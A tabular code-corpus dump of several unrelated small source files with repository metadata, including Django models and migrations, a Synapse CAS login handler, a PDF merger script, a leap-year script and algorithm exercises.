blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2 values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 213 values | src_encoding stringclasses 30 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 2 10.3M | extension stringclasses 246 values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
bfb8fe372429b608d6e289976184d5a3671112aa | dfe61b9a718c34cbb2c152246bd70f4675765792 | /adjure/models/__init__.py | 3526a58a2075d94808b6bd337514b235922b2f2f | [
"MIT"
] | permissive | bellyfat/adjure | eeda52dc4bdd79baaaf428030fdf1b1cd3b51069 | 974b4465ea9a827074472410d3013c3b5306b5d2 | refs/heads/master | 2022-01-05T15:44:35.931483 | 2019-02-18T20:47:30 | 2019-02-18T21:16:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 45 | py | from adjure.models.auth_user import AuthUser
| [
"ben@Bens-MacBook-Pro.local"
] | ben@Bens-MacBook-Pro.local |
7f15a14335ed0c863a97300fe65eedcc2b690e73 | 7ba2c4fb8b61185cc34aaccf9931c75e95ed5ce5 | /practice/explore_enron_data.py | 736db7f87e11d49dc0100e3d285b5a7c857b3eb1 | [] | no_license | vikramriyer/Predict_fraud_using_Machine_Learning | 3b27ca7b047029cb0515e9185958a26f141f4c45 | a618a40649db684c3b834f5ae811584d65018997 | refs/heads/master | 2021-06-22T07:43:44.621860 | 2017-07-26T00:36:22 | 2017-07-26T00:36:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,426 | py | #!/usr/bin/python
"""
Starter code for exploring the Enron dataset (emails + finances);
loads up the dataset (pickled dict of dicts).
The dataset has the form:
enron_data["LASTNAME FIRSTNAME MIDDLEINITIAL"] = { features_dict }
{features_dict} is a dictionary of features associated with that person.
You should explore features_dict as part of the mini-project,
but here's an example to get you started:
enron_data["SKILLING JEFFREY K"]["bonus"] = 5600000
"""
import pickle

# Running tallies collected while scanning the dataset (Python 2 script).
count = 0                   # number of persons of interest (poi == True)
c = 0                       # number of people with a known salary
persons_of_interest = []

# The dataset is a pickled dict of dicts keyed by person name.
# Missing financial values are encoded as the *string* 'NaN' (compared below).
enron_data = pickle.load(open("../final_project/final_project_dataset.pkl", "r"))

for k in enron_data:
    if enron_data[k]['salary'] != 'NaN':
        #print enron_data[k]['email_address']
        c += 1
    if enron_data[k]['poi'] == True:
        count += 1
        persons_of_interest.append(k)
    # Keys are upper-cased names, e.g. "FASTOW ANDREW S".
    if 'fastow'.upper() in k:
        pass#print enron_data[k]

#print enron_data['COLWELL']
# Number of persons of interest found in the dataset.
print count
#print persons_of_interest
#print enron_data["LAY KENNETH L"]["total_payments"]
#print c
#print sum([1 for key in enron_data.keys() if enron_data[key]['salary'] != 'NaN'])
#print sum([1 for key in enron_data.keys() if enron_data[key]['email_address'] != 'NaN'])
# Number of people whose total_payments field is missing.
print sum([1 for key in enron_data.keys() if enron_data[key]['total_payments'] == 'NaN'])
print sum([1 for key in enron_data.keys() if enron_data[key]['poi'] == True and enron_data[key]['total_payments'] == 'NaN']) | [
"vikram.iyer09@gmail.com"
] | vikram.iyer09@gmail.com |
a891e3d2acbf47e75c7dbb4843e109d1c043dfbb | ebaba64bfe8e2e647c34e2219c924728e084f3a8 | /app/models/common.py | 584e79018139cb9e3e565c3fed02ca73e67dcb64 | [] | no_license | twinstae/realworld-fastapi | e2a40e2299b900cc27e7e3f00f26736310ac27f1 | 9a51784cd3e05b5a85a377865983718a31de93fb | refs/heads/main | 2023-04-17T08:23:15.280461 | 2021-05-04T02:43:06 | 2021-05-04T02:43:06 | 328,108,621 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 498 | py | from datetime import datetime
from pydantic import BaseModel, Field, validator
class DateTimeModelMixin(BaseModel):
    """Mixin adding created/updated timestamps that default to "now"."""

    created_at: datetime = None  # type: ignore
    updated_at: datetime = None  # type: ignore

    @validator("created_at", "updated_at", pre=True)
    def default_datetime(
        cls,  # noqa: N805
        value: datetime,  # noqa: WPS110
    ) -> datetime:
        """Fall back to the current time when no value was supplied."""
        if value:
            return value
        return datetime.now()
class IDModelMixin(BaseModel):
    """Mixin exposing an integer primary key, serialized under the alias "id"."""

    id_: int = Field(0, alias="id")
| [
"rabolution@gmail.com"
] | rabolution@gmail.com |
5facdbc7160f4c2041e7d9a208b1f07ed0e14ccd | 7179c77f220e5adf1354292c1d3069e0e37bd10f | /Rush00/moviemon/utils/load.py | f5f4d41cc3cde8d89f6706454bd0c0ceb20e7922 | [] | no_license | MishinK/Django_pool | 09d7244e5ba397dba2d3797b0c3fc6b08862d2dd | 484271c63c299c53bf59dacc2412927e818b8096 | refs/heads/main | 2023-09-03T18:14:01.176740 | 2021-11-11T06:23:45 | 2021-11-11T06:23:45 | 426,892,862 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 381 | py | from django.shortcuts import redirect
from functools import wraps
from moviemon.utils.game import load_session_data
def load_midd(view_function):
    """Decorator: redirect to the title screen when no saved game data exists.

    Wraps a Django view so it only runs once ``load_session_data()`` returns
    something other than ``None``.
    """
    @wraps(view_function)
    def wrapper(request, *args, **kwargs):
        if load_session_data() is None:
            # No saved game: send the player back to the title screen.
            return redirect("title")
        return view_function(request, *args, **kwargs)
    return wrapper
| [
"mka456@yandex.ru"
] | mka456@yandex.ru |
4830b0ef10483ac92c978cef7bdf5ac2da64be45 | 7b64171318103d29feb06fed0003b4f9adc6a2c4 | /backend/backend/views.py | 9e1afcae7d37923125e35faa56f075b9e1a9fa81 | [] | no_license | mobuchowski/jnp3 | 25ef5474a9fd7fef15d5fcfc57336904b693b2ba | db0c8e317ba7a3e40c409806ca86b8e6bca857c0 | refs/heads/master | 2023-03-04T19:05:21.156136 | 2017-01-24T15:49:56 | 2017-01-24T15:49:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 69 | py | from api.views import UserDetail
from django.shortcuts import render
| [
"matxxx01@gmail.com"
] | matxxx01@gmail.com |
2a46ee9f78437e46ba7da582c601803165ce6ffe | d6befe88e1bcd00d319ae16f3901908102d18591 | /api/sonetworks/migrations/0017_auto_20170410_2254.py | 44c595b658d5d7393887b0fa8b3ff66931ae6160 | [
"MIT"
] | permissive | ecelis/semitki | b50c8e211462ef0a98a60ed4b9643be3faea1731 | 6c7cbb2bb2260db79478de48a9b2e71b8ed633ff | refs/heads/master | 2021-06-24T03:02:56.696206 | 2017-06-20T16:04:36 | 2017-06-20T16:04:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,709 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-04-10 22:54
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import uuid
class Migration(migrations.Migration):
    # Schema rework: adds Campaign, Phase, SocialGroup and SocialAccountGroup;
    # removes the old Project, Topic and SocialAccountsGroup models; and adds
    # activity/validity fields to SocialAccount.
    # NOTE(review): Campaign uses "valid_to" while the other models use
    # "validTo" — inconsistent, but changing it requires a new migration.

    dependencies = [
        ('sonetworks', '0016_remove_staticpage_page'),
    ]

    operations = [
        migrations.CreateModel(
            name='Campaign',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                ('name', models.CharField(max_length=140)),
                ('description', models.CharField(max_length=256)),
                ('isactive', models.BooleanField(default=True)),
                ('valid_to', models.DateField(blank=True, null=True)),
            ],
        ),
        migrations.CreateModel(
            name='Phase',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                ('name', models.CharField(max_length=140)),
                ('description', models.CharField(max_length=256)),
                ('isactive', models.BooleanField(default=True)),
                ('validTo', models.DateField(blank=True, null=True)),
                # Each phase belongs to exactly one campaign.
                ('campaign', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sonetworks.Campaign')),
            ],
        ),
        migrations.CreateModel(
            name='SocialAccountGroup',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                ('isactive', models.BooleanField(default=True)),
                ('validTo', models.DateField(blank=True, null=True)),
            ],
        ),
        migrations.CreateModel(
            name='SocialGroup',
            fields=[
                ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
                ('name', models.CharField(max_length=140)),
                ('description', models.CharField(max_length=256)),
                ('isactive', models.BooleanField(default=True)),
                ('validTo', models.DateField(blank=True, null=True)),
            ],
        ),
        migrations.RemoveField(
            model_name='socialaccountsgroup',
            name='socialaccounts',
        ),
        migrations.RemoveField(
            model_name='topic',
            name='project',
        ),
        migrations.RemoveField(
            model_name='post',
            name='topic',
        ),
        migrations.AddField(
            model_name='socialaccount',
            name='isactive',
            field=models.BooleanField(default=True),
        ),
        migrations.AddField(
            model_name='socialaccount',
            name='validTo',
            field=models.DateField(blank=True, null=True),
        ),
        migrations.AlterField(
            model_name='post',
            name='date',
            field=models.DateTimeField(),
        ),
        migrations.DeleteModel(
            name='Project',
        ),
        migrations.DeleteModel(
            name='SocialAccountsGroup',
        ),
        migrations.DeleteModel(
            name='Topic',
        ),
        # M2M links wiring accounts and groups onto the new grouping model.
        migrations.AddField(
            model_name='socialaccountgroup',
            name='socialaccount',
            field=models.ManyToManyField(blank=True, to='sonetworks.SocialAccount'),
        ),
        migrations.AddField(
            model_name='socialaccountgroup',
            name='socialgroup',
            field=models.ManyToManyField(blank=True, to='sonetworks.SocialGroup'),
        ),
    ]
| [
"gvaldez@gmail.com"
] | gvaldez@gmail.com |
2d804bd06aa80f5d4e72d9c9eb4591fccfcb358f | 02dc1f70da529c7c2aa45dcfe5e0a3aeeb1f98cc | /src/099_recover_binary_search_tree/099_recover_binary_search_tree.py | 007b57cf0c699c85f313ec566a75d2ce5c5492ac | [] | no_license | ypliu/leetcode-python | 2a5a14de6310cae19b9cc42091d81586e697fffb | 13e61c13c406a73debcfc996937cf16f715d55d1 | refs/heads/master | 2020-03-27T06:17:32.303442 | 2019-02-24T14:50:11 | 2019-02-24T14:50:11 | 146,094,735 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,395 | py | # Definition for a binary tree node.
class TreeNode(object):
    """A binary-tree node holding a value and left/right child links."""

    def __init__(self, x):
        # Children start empty; callers wire the tree together manually.
        self.val, self.left, self.right = x, None, None
class Solution(object):
    def recoverTree(self, root):
        """
        :type root: TreeNode
        :rtype: void Do not return anything, modify root in-place instead.

        Two nodes of a BST had their values swapped; locate them with an
        inorder walk and swap the values back in place.
        """
        if not root:
            return
        low_node, high_node = self.inorderTraversalStack(root)
        if low_node and high_node:
            low_node.val, high_node.val = high_node.val, low_node.val

    def inorderTraversalStack(self, root):
        """Iterative inorder scan; return the pair of out-of-order nodes."""
        previous = None
        bad_first = bad_second = None
        pending = []
        node = root
        while node or pending:
            # Walk down the left spine, stacking ancestors as we go.
            while node:
                pending.append(node)
                node = node.left
            node = pending.pop()
            # An inorder predecessor that is not smaller marks a violation:
            # the first violation fixes the earlier node, the last violation
            # fixes the later one.
            if previous is not None and previous.val >= node.val:
                if bad_first is None:
                    bad_first = previous
                bad_second = node
            previous = node
            node = node.right
        return bad_first, bad_second
# debug
# Ad-hoc smoke tests; the commented-out print inside recoverTree can be
# re-enabled to inspect which pair of values was swapped back.
s = Solution()
# Tree [1, 3, None, None, 2]: inorder is 3,2,1 -> nodes 1 and 3 were swapped.
root = TreeNode(1)
root.left = TreeNode(3)
root.left.right = TreeNode(2)
s.recoverTree(root)
# Tree [3, 1, 4, None, 2]: inorder is 1,3,2,4 -> nodes 3 and 2 were swapped.
root = TreeNode(3)
root.left = TreeNode(1)
root.right = TreeNode(4)
root.right.left = TreeNode(2)
s.recoverTree(root)
| [
"noreply@github.com"
] | ypliu.noreply@github.com |
ea1355bf106fc1f0df6f659e51c72ad48cb1c02a | dd12c10ca55da8bac3bdf87d474885aef956091e | /leap_year.py | db0c05a59a983f3252fcb64abf176a8100b3bda8 | [] | no_license | Diego91RA/school_2020_examples | 6a2232210bd4c70d0b4857c6faa69397db664c42 | 68cc411defe5def6702ba612768dfb498c62fefa | refs/heads/master | 2022-11-26T10:11:45.398232 | 2020-07-29T11:38:35 | 2020-07-29T11:38:35 | 282,643,462 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 311 | py | l = []
# Leap-year accumulator (mirrors the initialisation above).
l = []
for year in range(2020, 10001):
    # Gregorian rule: divisible by 4, except centuries not divisible by 400.
    if year % 4 == 0 and (year % 100 != 0 or year % 400 == 0):
        l.append(year)
print(l)
print(len(l))
c = 0
import calendar
# Cross-check the hand-rolled rule against the standard library.
for year in range(2020, 10001):
    if calendar.isleap(year):
        c += 1
print(c) | [
"13482645+Diego91RA@users.noreply.github.com"
] | 13482645+Diego91RA@users.noreply.github.com |
09a6e5cb15cb9e1a4d509bc8324a6e269ca25419 | 9ef64268573b24190aba70eabf3259f6cba4b95a | /synapse/handlers/cas_handler.py | 5060936f943a71e0eca920c51aea6e3e6fca81e9 | [
"Apache-2.0"
] | permissive | Zachinquarantine/synapse | c5f06b1dce8260f5adf17f445e6c2cb14b0b85da | abc814dcbf559282220c35a45b3959bb23a2ed50 | refs/heads/develop | 2023-04-10T10:55:09.150028 | 2021-04-09T12:11:51 | 2021-04-09T12:11:51 | 321,198,871 | 0 | 0 | Apache-2.0 | 2020-12-14T01:22:15 | 2020-12-14T01:22:14 | null | UTF-8 | Python | false | false | 14,232 | py | # -*- coding: utf-8 -*-
# Copyright 2020 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import urllib.parse
from typing import TYPE_CHECKING, Dict, List, Optional
from xml.etree import ElementTree as ET
import attr
from twisted.web.client import PartialDownloadError
from synapse.api.errors import HttpResponseException
from synapse.handlers.sso import MappingException, UserAttributes
from synapse.http.site import SynapseRequest
from synapse.types import UserID, map_username_to_mxid_localpart
if TYPE_CHECKING:
from synapse.server import HomeServer
logger = logging.getLogger(__name__)
class CasError(Exception):
    """Used to catch errors when validating the CAS ticket."""

    def __init__(self, error, error_description=None):
        self.error = error
        self.error_description = error_description

    def __str__(self):
        # Only append the description when one was actually provided.
        if not self.error_description:
            return self.error
        return "{}: {}".format(self.error, self.error_description)
@attr.s(slots=True, frozen=True)
class CasResponse:
    # Immutable parsed CAS serviceResponse: the authenticated username plus
    # any extra attributes (an attribute name may map to several values).
    username = attr.ib(type=str)
    attributes = attr.ib(type=Dict[str, List[Optional[str]]])
class CasHandler:
    """
    Utility class to handle the response from a CAS SSO service.

    Args:
        hs
    """

    def __init__(self, hs: "HomeServer"):
        self.hs = hs
        self._hostname = hs.hostname
        self._store = hs.get_datastore()
        self._auth_handler = hs.get_auth_handler()
        self._registration_handler = hs.get_registration_handler()

        self._cas_server_url = hs.config.cas_server_url
        self._cas_service_url = hs.config.cas_service_url
        self._cas_displayname_attribute = hs.config.cas_displayname_attribute
        self._cas_required_attributes = hs.config.cas_required_attributes

        self._http_client = hs.get_proxied_http_client()

        # identifier for the external_ids table
        self.idp_id = "cas"

        # user-facing name of this auth provider
        self.idp_name = "CAS"

        # we do not currently support brands/icons for CAS auth, but this is required by
        # the SsoIdentityProvider protocol type.
        self.idp_icon = None
        self.idp_brand = None
        self.unstable_idp_brand = None

        self._sso_handler = hs.get_sso_handler()

        self._sso_handler.register_identity_provider(self)

    def _build_service_param(self, args: Dict[str, str]) -> str:
        """
        Generates a value to use as the "service" parameter when redirecting or
        querying the CAS service.

        Args:
            args: Additional arguments to include in the final redirect URL.

        Returns:
            The URL to use as a "service" parameter.
        """
        return "%s?%s" % (
            self._cas_service_url,
            urllib.parse.urlencode(args),
        )

    async def _validate_ticket(
        self, ticket: str, service_args: Dict[str, str]
    ) -> CasResponse:
        """
        Validate a CAS ticket with the server, and return the parsed response.

        Args:
            ticket: The CAS ticket from the client.
            service_args: Additional arguments to include in the service URL.
                Should be the same as those passed to `handle_redirect_request`.

        Raises:
            CasError: If there's an error parsing the CAS response.

        Returns:
            The parsed CAS response.
        """
        uri = self._cas_server_url + "/proxyValidate"
        args = {
            "ticket": ticket,
            "service": self._build_service_param(service_args),
        }
        try:
            body = await self._http_client.get_raw(uri, args)
        except PartialDownloadError as pde:
            # Twisted raises this error if the connection is closed,
            # even if that's being used old-http style to signal end-of-data
            body = pde.response
        except HttpResponseException as e:
            # BUGFIX: `description` used to be wrapped in a 1-tuple (a stray
            # trailing comma after .format(...)), so CasError.error_description
            # was a tuple and rendered as "('…',)" in error messages. It is now
            # the plain string that CasError.__str__ expects.
            description = (
                'Authorization server responded with a "{status}" error '
                "while exchanging the authorization code."
            ).format(status=e.code)
            raise CasError("server_error", description) from e

        return self._parse_cas_response(body)

    def _parse_cas_response(self, cas_response_body: bytes) -> CasResponse:
        """
        Retrieve the user and other parameters from the CAS response.

        Args:
            cas_response_body: The response from the CAS query.

        Raises:
            CasError: If there's an error parsing the CAS response.

        Returns:
            The parsed CAS response.
        """

        # Ensure the response is valid.
        root = ET.fromstring(cas_response_body)
        if not root.tag.endswith("serviceResponse"):
            raise CasError(
                "missing_service_response",
                "root of CAS response is not serviceResponse",
            )

        success = root[0].tag.endswith("authenticationSuccess")
        if not success:
            # NOTE(review): "unsucessful_response" is misspelled, but it is an
            # emitted error code; kept as-is to avoid breaking consumers that
            # may match on it.
            raise CasError("unsucessful_response", "Unsuccessful CAS response")

        # Iterate through the nodes and pull out the user and any extra attributes.
        user = None
        attributes = {}  # type: Dict[str, List[Optional[str]]]
        for child in root[0]:
            if child.tag.endswith("user"):
                user = child.text
            if child.tag.endswith("attributes"):
                for attribute in child:
                    # ElementTree library expands the namespace in
                    # attribute tags to the full URL of the namespace.
                    # We don't care about namespace here and it will always
                    # be encased in curly braces, so we remove them.
                    tag = attribute.tag
                    if "}" in tag:
                        tag = tag.split("}")[1]
                    attributes.setdefault(tag, []).append(attribute.text)

        # Ensure a user was found.
        if user is None:
            raise CasError("no_user", "CAS response does not contain user")

        return CasResponse(user, attributes)

    async def handle_redirect_request(
        self,
        request: SynapseRequest,
        client_redirect_url: Optional[bytes],
        ui_auth_session_id: Optional[str] = None,
    ) -> str:
        """Generates a URL for the CAS server where the client should be redirected.

        Args:
            request: the incoming HTTP request
            client_redirect_url: the URL that we should redirect the
                client to after login (or None for UI Auth).
            ui_auth_session_id: The session ID of the ongoing UI Auth (or
                None if this is a login).

        Returns:
            URL to redirect to
        """

        if ui_auth_session_id:
            service_args = {"session": ui_auth_session_id}
        else:
            assert client_redirect_url
            service_args = {"redirectUrl": client_redirect_url.decode("utf8")}

        args = urllib.parse.urlencode(
            {"service": self._build_service_param(service_args)}
        )

        return "%s/login?%s" % (self._cas_server_url, args)

    async def handle_ticket(
        self,
        request: SynapseRequest,
        ticket: str,
        client_redirect_url: Optional[str],
        session: Optional[str],
    ) -> None:
        """
        Called once the user has successfully authenticated with the SSO.
        Validates a CAS ticket sent by the client and completes the auth process.

        If the user interactive authentication session is provided, marks the
        UI Auth session as complete, then returns an HTML page notifying the
        user they are done.

        Otherwise, this registers the user if necessary, and then returns a
        redirect (with a login token) to the client.

        Args:
            request: the incoming request from the browser. We'll
                respond to it with a redirect or an HTML page.

            ticket: The CAS ticket provided by the client.

            client_redirect_url: the redirectUrl parameter from the `/cas/ticket` HTTP request, if given.
                This should be the same as the redirectUrl from the original `/login/sso/redirect` request.

            session: The session parameter from the `/cas/ticket` HTTP request, if given.
                This should be the UI Auth session id.
        """
        args = {}
        if client_redirect_url:
            args["redirectUrl"] = client_redirect_url
        if session:
            args["session"] = session

        try:
            cas_response = await self._validate_ticket(ticket, args)
        except CasError as e:
            logger.exception("Could not validate ticket")
            self._sso_handler.render_error(request, e.error, e.error_description, 401)
            return

        await self._handle_cas_response(
            request, cas_response, client_redirect_url, session
        )

    async def _handle_cas_response(
        self,
        request: SynapseRequest,
        cas_response: CasResponse,
        client_redirect_url: Optional[str],
        session: Optional[str],
    ) -> None:
        """Handle a CAS response to a ticket request.

        Assumes that the response has been validated. Maps the user onto an MXID,
        registering them if necessary, and returns a response to the browser.

        Args:
            request: the incoming request from the browser. We'll respond to it with an
                HTML page or a redirect

            cas_response: The parsed CAS response.

            client_redirect_url: the redirectUrl parameter from the `/cas/ticket` HTTP request, if given.
                This should be the same as the redirectUrl from the original `/login/sso/redirect` request.

            session: The session parameter from the `/cas/ticket` HTTP request, if given.
                This should be the UI Auth session id.
        """

        # first check if we're doing a UIA
        if session:
            return await self._sso_handler.complete_sso_ui_auth_request(
                self.idp_id,
                cas_response.username,
                session,
                request,
            )

        # otherwise, we're handling a login request.

        # Ensure that the attributes of the logged in user meet the required
        # attributes.
        if not self._sso_handler.check_required_attributes(
            request, cas_response.attributes, self._cas_required_attributes
        ):
            return

        # Call the mapper to register/login the user

        # If this not a UI auth request than there must be a redirect URL.
        assert client_redirect_url is not None

        try:
            await self._complete_cas_login(cas_response, request, client_redirect_url)
        except MappingException as e:
            logger.exception("Could not map user")
            self._sso_handler.render_error(request, "mapping_error", str(e))

    async def _complete_cas_login(
        self,
        cas_response: CasResponse,
        request: SynapseRequest,
        client_redirect_url: str,
    ) -> None:
        """
        Given a CAS response, complete the login flow

        Retrieves the remote user ID, registers the user if necessary, and serves
        a redirect back to the client with a login-token.

        Args:
            cas_response: The parsed CAS response.
            request: The request to respond to
            client_redirect_url: The redirect URL passed in by the client.

        Raises:
            MappingException if there was a problem mapping the response to a user.
            RedirectException: some mapping providers may raise this if they need
                to redirect to an interstitial page.
        """
        # Note that CAS does not support a mapping provider, so the logic is hard-coded.
        localpart = map_username_to_mxid_localpart(cas_response.username)

        async def cas_response_to_user_attributes(failures: int) -> UserAttributes:
            """
            Map from CAS attributes to user attributes.
            """
            # Due to the grandfathering logic matching any previously registered
            # mxids it isn't expected for there to be any failures.
            if failures:
                raise RuntimeError("CAS is not expected to de-duplicate Matrix IDs")

            # Arbitrarily use the first attribute found.
            display_name = cas_response.attributes.get(
                self._cas_displayname_attribute, [None]
            )[0]

            return UserAttributes(localpart=localpart, display_name=display_name)

        async def grandfather_existing_users() -> Optional[str]:
            # Since CAS did not always use the user_external_ids table, always
            # to attempt to map to existing users.
            user_id = UserID(localpart, self._hostname).to_string()

            logger.debug(
                "Looking for existing account based on mapped %s",
                user_id,
            )

            users = await self._store.get_users_by_id_case_insensitive(user_id)
            if users:
                registered_user_id = list(users.keys())[0]
                logger.info("Grandfathering mapping to %s", registered_user_id)
                return registered_user_id

            return None

        await self._sso_handler.complete_sso_login_request(
            self.idp_id,
            cas_response.username,
            request,
            client_redirect_url,
            cas_response_to_user_attributes,
            grandfather_existing_users,
        )
| [
"noreply@github.com"
] | Zachinquarantine.noreply@github.com |
3c5c399e0a23305be3ae7f2a48763bcbf20f2506 | 10134a8b3ffaca93cd2cc4a7adb8c676947cf1bd | /Scripts/merged.py | ccc2c0db5f18f002c537ef2898d2c20175f6c244 | [
"MIT"
] | permissive | usman-dev/PDFs-TextExtract | 7cb74db114a49dfbc939dae0be48b316f37f99d9 | f07aadb3057bf98fce63269bc2ba252b00efa4a6 | refs/heads/master | 2023-04-07T20:34:17.893296 | 2021-04-10T21:38:42 | 2021-04-10T21:38:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 583 | py | import glob
from PyPDF2 import PdfFileWriter, PdfFileReader
def merger(output_path, input_paths):
    """Concatenate the given PDFs, in order, into a single file.

    Args:
        output_path: where the merged PDF is written.
        input_paths: iterable of source PDF paths, merged in iteration order.
    """
    writer = PdfFileWriter()
    for pdf_path in input_paths:
        reader = PdfFileReader(pdf_path)
        # Copy every page of this document into the output.
        for page_index in range(reader.getNumPages()):
            writer.addPage(reader.getPage(page_index))
    with open(output_path, 'wb') as out_file:
        writer.write(out_file)
if __name__ == '__main__':
    # Collect every sample PDF and sort so the page order is deterministic.
    paths = glob.glob('../PDFs-TextExtract/samples/*.pdf')
    paths.sort()
    merger('../PDFs-TextExtract/pdf_merged.pdf', paths)
print("Done, PDF Merged successfully..") | [
"ahmedkhemiri24@outlook.fr"
] | ahmedkhemiri24@outlook.fr |
3183ecf1900a24188a08ca3f2ea88ac1e56e75d8 | 33c346f7eaef356b84f63622acb79619b7a685ed | /apiserver/server/libs/Coder.py | 5fe93cc34d90731584172c79f7e5f24ed00c6dc1 | [] | no_license | rhdtl78/Open-Bigdata-Visualization-Analysis- | 90966d9ed65edfa4b0c5f7685f627b5e969d9b63 | b156d03ed52dfba81b1758c7edc90249211768c4 | refs/heads/master | 2023-01-21T04:59:51.325739 | 2019-09-02T05:03:45 | 2019-09-02T05:03:45 | 138,969,085 | 3 | 1 | null | 2023-01-09T11:27:29 | 2018-06-28T05:13:34 | JavaScript | UTF-8 | Python | false | false | 1,492 | py | import pandas as pd
import numpy
class Coder:
    """Decodes escaped characters in column names of posted data."""

    # Escape sequence -> original character (e.g. "&46;" was used in place
    # of "." in stored field names).
    _DECODE_TABLE = (
        ("&35;", "#"),
        ("&36;", "$"),
        ("&46;", "."),
        ("&91;", "["),
        ("&93;", "]"),
        ("&47;", "/"),
    )

    def __init__(self):
        self.escapeList = []

    def escape(self, data):
        """Build a DataFrame from *data*'s values and decode its column names.

        Args:
            data: mapping whose values are row dicts; keys may contain the
                escape sequences listed in _DECODE_TABLE.

        Returns:
            pandas.DataFrame with the decoded column names.
        """
        frame = pd.DataFrame(list(data.values()))
        decoded_names = []
        for name in frame.columns.values.tolist():
            for code, char in self._DECODE_TABLE:
                name = name.replace(code, char)
            decoded_names.append(name)
        frame.columns = decoded_names
        return frame
| [
"rhdtl78@gmail.com"
] | rhdtl78@gmail.com |
8bcfcf6a35cb053347ebb04734d81c1d81d8ba98 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_53/278.py | 96c372a1906d7ba215f82dabd1b59a7ee8d0f1b0 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 252 | py | #!/usr/bin/python
# Python 2 Code Jam solution.  The first stdin line is the number of test
# cases; each case gives N and K.  The answer is "ON" exactly when the N
# lowest bits of K are all set.
for i in range(1, int(raw_input())+1):
    N, K = map(int, raw_input().split())
    result = 'ON'
    # Scan bits 0..N-1 of K; any cleared bit forces "OFF".
    for j in range(N):
        if K & (1<<j) == 0:
            result = 'OFF'
            break
    print 'Case #%d: %s' % (i, result)
| [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
64ab96786261069745119f13da7c1a8d8eaa975a | d32d727252dbda22cd3d4b68c0e6f01abf8c7549 | /src/tweetme/views.py | a092fa8ac4811fa167aa58886b6375a73299d7a8 | [] | no_license | chintan2011/tweetme | aa6fa7666692ccb3bc7e84ceb3fd1b5227b289cb | a7e09cf1e88950bad7d50a1f137cb3762e4bab33 | refs/heads/master | 2020-03-23T06:30:44.815158 | 2018-10-11T02:00:17 | 2018-10-11T02:00:17 | 141,213,289 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 140 | py | from django.shortcuts import render
# Retrieve (READ): handle GET by rendering the home.html template.
def home(request):
    """Render the home page template with an empty context."""
    return render(request,"home.html",{})
"chintan2011@gmail.com"
] | chintan2011@gmail.com |
70bc6a51ddc9d9ad4fc02a3e8c912d43e224c8ee | c3017c1dbfaf963679c9833e64fe71f0e355c110 | /user_profile/migrations/0004_auto_20210407_1755.py | 6380c80e971eb891a612854fbf42aa763a873b24 | [] | no_license | Lokker29/fun_queue | f9e2abca6e12ba2f3c09c48a8281ea36425c3de0 | 894b501d18c2996c291b021f92dca4e93198d3ff | refs/heads/main | 2023-04-04T16:47:09.024952 | 2021-04-09T05:03:18 | 2021-04-09T05:03:18 | 356,141,290 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 781 | py | # Generated by Django 3.2 on 2021-04-07 17:55
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Links each user to an optional university group and updates UniGroup's
    # human-readable (Ukrainian) verbose names.

    dependencies = [
        ('user_profile', '0003_unigroup'),
    ]

    operations = [
        migrations.AlterModelOptions(
            name='unigroup',
            options={'verbose_name': 'Університетська група', 'verbose_name_plural': 'Університетські групи'},
        ),
        # Nullable FK: deleting a UniGroup leaves its users intact (SET_NULL).
        migrations.AddField(
            model_name='user',
            name='uni_group',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='user_profile.unigroup', verbose_name='Університетська група'),
        ),
    ]
| [
"bohdan.bilokon@raccoongang.com"
] | bohdan.bilokon@raccoongang.com |
